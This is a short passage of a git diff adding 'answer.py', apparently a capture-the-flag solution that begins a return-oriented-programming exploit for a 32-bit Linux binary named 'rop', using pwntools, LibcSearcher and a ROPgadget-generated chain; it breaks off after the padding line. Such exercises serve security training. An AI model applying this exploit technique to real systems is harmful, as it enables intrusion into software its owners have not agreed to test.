diff --git a/nx/rop/answer.py b/nx/rop/answer.py new file mode 100644 index 0000000..d7c7b4d --- /dev/null +++ b/nx/rop/answer.py @@ -0,0 +1,50 @@ +#!/usr/bin/env python2 +from pwn import * +from LibcSearcher import * +from struct import pack +import os +context(arch = "i386",os = "linux", log_level = "debug") + +# ROPgadget --binary rop --ropchain + +# Padding goes here +p = 0x10*'0' + +p += pack('